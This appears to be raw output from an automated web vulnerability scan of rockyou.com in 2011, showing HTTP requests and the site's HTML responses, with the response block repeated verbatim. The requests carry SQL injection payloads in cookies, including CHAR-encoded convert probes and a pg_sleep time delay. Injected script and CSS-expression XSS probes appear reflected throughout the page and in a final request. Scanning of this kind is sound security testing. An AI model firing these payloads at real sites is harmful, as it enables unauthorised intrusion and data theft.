Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303167683; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 23:01:30 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:01:29 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 23:01:30 GMT; path=/; domain=.rockyou.com,lastlogin=1303167690; expires=Wed, 27-Jul-2011 23:01:30 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 23:01:30 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=14742 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 5079
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/browse.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/search.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class=""
style="background-image: url(/images/menu-bg.gif); background-repeat: repeat-x;"
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload=""
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="display:block;width:840px;height:68px;border:0px;position:relative;">
<a href="/index.php"><img src="/images/logo-menutop-rockyou.gif" alt=""></a>
<table cellpadding="1" cellspacing="0" style="position:absolute;top:0px;left:107px;"><tr>
<td style="font-size:15px"><a class="mainmenu" href="/choose_widget.php">Create</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/my_stuff.php">My Stuff</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/featuredartists.php">Browse</a></td>
</tr></table>
<img src="/images/index_tab.gif" style="position:absolute;top:0px;left:620px">
<div style="position:absolute;top:5px;left:630px;font-size:11px;font-family:arial;width:200px;text-align:center;">
<a href="http://www.rockyou.com/login/" style="color: white;">login / register</a> </div>
</div>
<div style="position:absolute;top:24;left:628;">
<form method="get" action="/search_main.php">
<table class="search" id="search_box"><tr><td>
<input type="text" name="s_tsearch" size=17 style="border:2px solid #6388c2"/></td>
<td><input type="submit" value="search" />
</td></tr></table> <input type="hidden" value="1" name="p" /></form>
</div>
<!-- TF 728x90 JScript NoAD code -->
<div style="width:850px;margin-bottom:10px;">
<div style='padding-left:60px;'>
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div>
</div>
<script>
function buttonHover(id) {
document.getElementById(id).style.backgroundColor = '#99aabb';
document.getElementById(id).style.color = '#ffffff';
document.getElementById(id).style.border = '1px solid #ffffff';
/*document.getElementById(id).style.borderRight = '1px solid #ffffff';*/
}
function buttonOut(id) {
document.getElementById(id).style.backgroundColor = '#E8EBF0';
document.getElementById(id).style.color = '#000000';
document.getElementById(id).style.border = '1px solid #99aabb';
}
/*onMouseOver="buttonHover(this.id);" onMouseOut="buttonOut(this.id);"*/
</script>
<div id="search_bar">
<ul id="menu">
<li id="selected">Slideshows</li>
<!--<li><a href='/search_people.php?q=\' stYle=x:expre/**/ssion(netsparker(9)) ns=\' &p=1'>People</a></li>!-->
</ul>
<div id="contents">
<form method='get'>
<table id="input_table">
<tr><td>
<input id="search_input" name="s_tsearch" type="text" value="\' stYle=x:expre/**/ssion(netsparker(9)) ns=\' " /></td>
<td><input id="search_button" value="Search" type="submit" /></td>
</tr></table>
</form>
</div>
</div>
<div id="search_res">
<table width='800' cellspacing=5 cellpadding=0 ><tr><td colspan='5'><tr><td colspan='1' align='left'><strong>1 - 20</strong></td>
<td colspan='3' align='center'><em class='curr_page'>Top Ranked</em> | <a href='?s_pindex=-20&s_sort=views&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '>Most Viewed</a> | <a href='?s_pindex=-20&s_sort=date&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '>Most Recent</a></td>
<td colspan='1' align='right'><em class='curr_page'>1</em><tr><td><br /><br /></td></tr></td></tr><td class='resultentrys' style='text-align:center;vertical-align:text-bottom;'><div class='imgwraps'><a href='/viewslideshow.php?instanceid=41826857&s_pindex=1&s_sort=rank&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '><img class='slidethumb' src='http://img156.rockyou.com/41/41826/41826857/41826857_6e20a7151161267112.JPG'></a></div><a href='/viewslideshow.php?instanceid=41826857&s_pindex=2&s_sort=rank&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '>TAHNIAH KOPRAL MUHD ...<!--<br />
<img alt='Play Slideshow!' src='/images/lang/en/pllay.jpg' border='1' />--></a><br />
Views: 500 <br /><br /><td class='resultentrys' style='text-align:center;vertical-align:text-bottom;'><div class='imgwraps'><a href='/viewslideshow.php?instanceid=46686943&s_pindex=2&s_sort=rank&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '><img class='slidethumb' src='http://img163.rockyou.com/46/46686/46686943/46686943_2a97e2f91165954728.jpg'></a></div><a href='/viewslideshow.php?instanceid=46686943&s_pindex=3&s_sort=rank&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '>[No Title]<!--<br />
<img alt='Play Slideshow!' src='/images/lang/en/pllay.jpg' border='1' />--></a><br />
Views: 145 <br /><br /><tr><td colspan='3' align='left'><strong>1 - 20</strong></td><td colspan='2' align='right'><em class='curr_page'>1</em></td></tr></table></div>
<div style='position: absolute; left: 850px; top: 0px; width: 160px;'>
<div style="border:1px solid #ccc;margin-top:70px;width:176px;height:236px;margin-bottom:10px;">
<div style="padding:8px;">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/AGE=/GENDER=/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/" ' +
'width="160" height="220" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=SHOWMYGALLLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div>
</div>
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/aamsz=PM3/AGE=/GENDER=/-->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/aamsz=PM3/AGE=/GENDER=/" ' +
'width="180" height="288" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/aamsz=PM3/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/aamsz=PM3/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
<br />
<div id="googleAdUnitIframe_1"></div>
<HR>
<script type="text/javascript">
var googleAdIframeTable = [ ['googleAdUnitIframe_1', 3],
];
var googleAdClient = "pub-3255760518790512";
var googleAdChannel = "";
var googleAdSearchQueryString = "s_tsearch";
var googleAdFrameborder = '0';
var googleAdColorDiv = 'FFFFFF';
var googleAdColorBg = 'FFFFFF';
var googleAdColorLink = '0000CC';
var googleAdColorVLink = '0000CC';
var googleAdColorALink = '0000CC';
var googleAdColorText = '000000';
var googleAdColorAltText = '008000';
// The following parameter is optional:
var go..
Date: Mon, 18 Apr 2011 23:01:30 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:01:29 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 23:01:30 GMT; path=/; domain=.rockyou.com,lastlogin=1303167690; expires=Wed, 27-Jul-2011 23:01:30 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 23:01:30 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=14742 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 5079
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/browse.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/search.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class=""
style="background-image: url(/images/menu-bg.gif); background-repeat: repeat-x;"
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload=""
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="display:block;width:840px;height:68px;border:0px;position:relative;">
<a href="/index.php"><img src="/images/logo-menutop-rockyou.gif" alt=""></a>
<table cellpadding="1" cellspacing="0" style="position:absolute;top:0px;left:107px;"><tr>
<td style="font-size:15px"><a class="mainmenu" href="/choose_widget.php">Create</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/my_stuff.php">My Stuff</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/featuredartists.php">Browse</a></td>
</tr></table>
<img src="/images/index_tab.gif" style="position:absolute;top:0px;left:620px">
<div style="position:absolute;top:5px;left:630px;font-size:11px;font-family:arial;width:200px;text-align:center;">
<a href="http://www.rockyou.com/login/" style="color: white;">login / register</a> </div>
</div>
<div style="position:absolute;top:24;left:628;">
<form method="get" action="/search_main.php">
<table class="search" id="search_box"><tr><td>
<input type="text" name="s_tsearch" size=17 style="border:2px solid #6388c2"/></td>
<td><input type="submit" value="search" />
</td></tr></table> <input type="hidden" value="1" name="p" /></form>
</div>
<!-- TF 728x90 JScript NoAD code -->
<div style="width:850px;margin-bottom:10px;">
<div style='padding-left:60px;'>
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div>
</div>
<script>
function buttonHover(id) {
document.getElementById(id).style.backgroundColor = '#99aabb';
document.getElementById(id).style.color = '#ffffff';
document.getElementById(id).style.border = '1px solid #ffffff';
/*document.getElementById(id).style.borderRight = '1px solid #ffffff';*/
}
function buttonOut(id) {
document.getElementById(id).style.backgroundColor = '#E8EBF0';
document.getElementById(id).style.color = '#000000';
document.getElementById(id).style.border = '1px solid #99aabb';
}
/*onMouseOver="buttonHover(this.id);" onMouseOut="buttonOut(this.id);"*/
</script>
<div id="search_bar">
<ul id="menu">
<li id="selected">Slideshows</li>
<!--<li><a href='/search_people.php?q=\' stYle=x:expre/**/ssion(netsparker(9)) ns=\' &p=1'>People</a></li>!-->
</ul>
<div id="contents">
<form method='get'>
<table id="input_table">
<tr><td>
<input id="search_input" name="s_tsearch" type="text" value="\' stYle=x:expre/**/ssion(netsparker(9)) ns=\' " /></td>
<td><input id="search_button" value="Search" type="submit" /></td>
</tr></table>
</form>
</div>
</div>
<div id="search_res">
<table width='800' cellspacing=5 cellpadding=0 ><tr><td colspan='5'><tr><td colspan='1' align='left'><strong>1 - 20</strong></td>
<td colspan='3' align='center'><em class='curr_page'>Top Ranked</em> | <a href='?s_pindex=-20&s_sort=views&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '>Most Viewed</a> | <a href='?s_pindex=-20&s_sort=date&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '>Most Recent</a></td>
<td colspan='1' align='right'><em class='curr_page'>1</em><tr><td><br /><br /></td></tr></td></tr><td class='resultentrys' style='text-align:center;vertical-align:text-bottom;'><div class='imgwraps'><a href='/viewslideshow.php?instanceid=41826857&s_pindex=1&s_sort=rank&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '><img class='slidethumb' src='http://img156.rockyou.com/41/41826/41826857/41826857_6e20a7151161267112.JPG'></a></div><a href='/viewslideshow.php?instanceid=41826857&s_pindex=2&s_sort=rank&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '>TAHNIAH KOPRAL MUHD ...<!--<br />
<img alt='Play Slideshow!' src='/images/lang/en/pllay.jpg' border='1' />--></a><br />
Views: 500 <br /><br /><td class='resultentrys' style='text-align:center;vertical-align:text-bottom;'><div class='imgwraps'><a href='/viewslideshow.php?instanceid=46686943&s_pindex=2&s_sort=rank&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '><img class='slidethumb' src='http://img163.rockyou.com/46/46686/46686943/46686943_2a97e2f91165954728.jpg'></a></div><a href='/viewslideshow.php?instanceid=46686943&s_pindex=3&s_sort=rank&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '>[No Title]<!--<br />
<img alt='Play Slideshow!' src='/images/lang/en/pllay.jpg' border='1' />--></a><br />
Views: 145 <br /><br /><tr><td colspan='3' align='left'><strong>1 - 20</strong></td><td colspan='2' align='right'><em class='curr_page'>1</em></td></tr></table></div>
<div style='position: absolute; left: 850px; top: 0px; width: 160px;'>
<div style="border:1px solid #ccc;margin-top:70px;width:176px;height:236px;margin-bottom:10px;">
<div style="padding:8px;">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/AGE=/GENDER=/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/" ' +
'width="160" height="220" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=SHOWMYGALLLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div>
</div>
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/aamsz=PM3/AGE=/GENDER=/-->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/aamsz=PM3/AGE=/GENDER=/" ' +
'width="180" height="288" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/aamsz=PM3/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/aamsz=PM3/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
<br />
<div id="googleAdUnitIframe_1"></div>
<HR>
<script type="text/javascript">
var googleAdIframeTable = [ ['googleAdUnitIframe_1', 3],
];
var googleAdClient = "pub-3255760518790512";
var googleAdChannel = "";
var googleAdSearchQueryString = "s_tsearch";
var googleAdFrameborder = '0';
var googleAdColorDiv = 'FFFFFF';
var googleAdColorBg = 'FFFFFF';
var googleAdColorLink = '0000CC';
var googleAdColorVLink = '0000CC';
var googleAdColorALink = '0000CC';
var googleAdColorText = '000000';
var googleAdColorAltText = '008000';
// The following parameter is optional:
var go..
|
- /slideshow-viewplaylist.php
/slideshow-viewplaylist.php |
Parameters
| Parameter | Type | Value |
| lang | GET | en |
| instanceid | GET | 117242930�'"--></style></script><script>alert(0x001F33)</script> |
Request
GET /slideshow-viewplaylist.php?lang=en&instanceid=117242930%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001F33)%3C%2Fscript%3E HTTP/1.1
Referer: http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=117242930
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
